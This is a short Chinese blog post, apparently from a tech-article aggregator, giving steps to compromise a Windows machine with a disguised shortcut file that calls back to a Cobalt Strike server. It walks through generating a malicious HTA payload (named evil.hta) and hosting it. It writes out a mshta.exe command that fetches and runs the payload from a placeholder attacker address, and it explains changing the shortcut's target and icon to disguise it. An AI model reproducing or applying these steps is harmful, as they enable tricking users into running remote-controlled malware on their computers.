当前位置:网站首页>利用快捷方式-LNK-上线CS
利用快捷方式-LNK-上线CS
2022-07-06 06:24:00 【zxl2605】
步骤:
1、生成:Attacks -> Packages -> Html Application
2、上传:Attacks——>Web Drive by——>Host file
3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
4、伪装:
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装
这里会用到windows中的mshta,用于执行hta文件
mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件
下面进行演示
打开已经配置好的CS
1、生成:Attacks -> Packages -> Html Application
选择设置的监听器-power shell
生成evil.hta
2、上传:Attacks——>Web Drive by——>Host file
复制生成的利用文件网址
3.创建快捷方式
4.执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
5.伪装(自行拓展,不做演示)
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装(自行扩展)
点击快捷方式-快捷方式成功上线
边栏推荐
- Lecture 8: 1602 LCD (Guo Tianxiang)
- Oscp raven2 target penetration process
- [Tera term] black cat takes you to learn TTL script -- serial port automation skill in embedded development
- Set the print page style by modifying style
- D - How Many Answers Are Wrong
- 这些年用Keil遇到的坑
- [mqtt from getting started to improving series | 01] quickly build an mqtt test environment from 0 to 1
- Delete the variables added to watch1 in keil MDK
- 一文揭开,测试外包公司的真 相
- Difference between backtracking and recursion
猜你喜欢
Error getting a new connection Cause: org. apache. commons. dbcp. SQLNestedException
mysql按照首字母排序
Database isolation level
MySQL5.72.msi安装失败
在uni-app中使用腾讯视频插件播放视频
今日夏至 Today‘s summer solstice
The whole process realizes the single sign on function and the solution of "canceltoken" of undefined when the request is canceled
Isam2 operation process
![[mqtt from getting started to improving series | 01] quickly build an mqtt test environment from 0 to 1](/img/03/3727e0ddf2e8e61e500c6e4d989c00.png)
[mqtt from getting started to improving series | 01] quickly build an mqtt test environment from 0 to 1
D - How Many Answers Are Wrong
随机推荐
JMeter做接口测试,如何提取登录Cookie
Cannot create poolableconnectionfactory (could not create connection to database server. error
Simulation volume leetcode [general] 1109 Flight reservation statistics
Summary of the post of "Web Test Engineer"
G - Supermarket
MFC 动态创建的对话框及改变控件的大小和位置
使用Nacos管理配置
My daily learning records / learning methods
Isam2 operation process
职场进阶指南:大厂人必看书籍推荐
Black cat takes you to learn UFS protocol Chapter 18: how UFS configures logical units (Lu Management)
如何做好金融文献翻译?
Web界面元素的测试
模拟卷Leetcode【普通】1249. 移除无效的括号
[C language] qsort function
Private cloud disk deployment
MFC on the conversion and display of long string unsigned char and CString
G - Supermarket
LeetCode 729. My schedule I
Making interactive page of "left tree and right table" based on jeecg-boot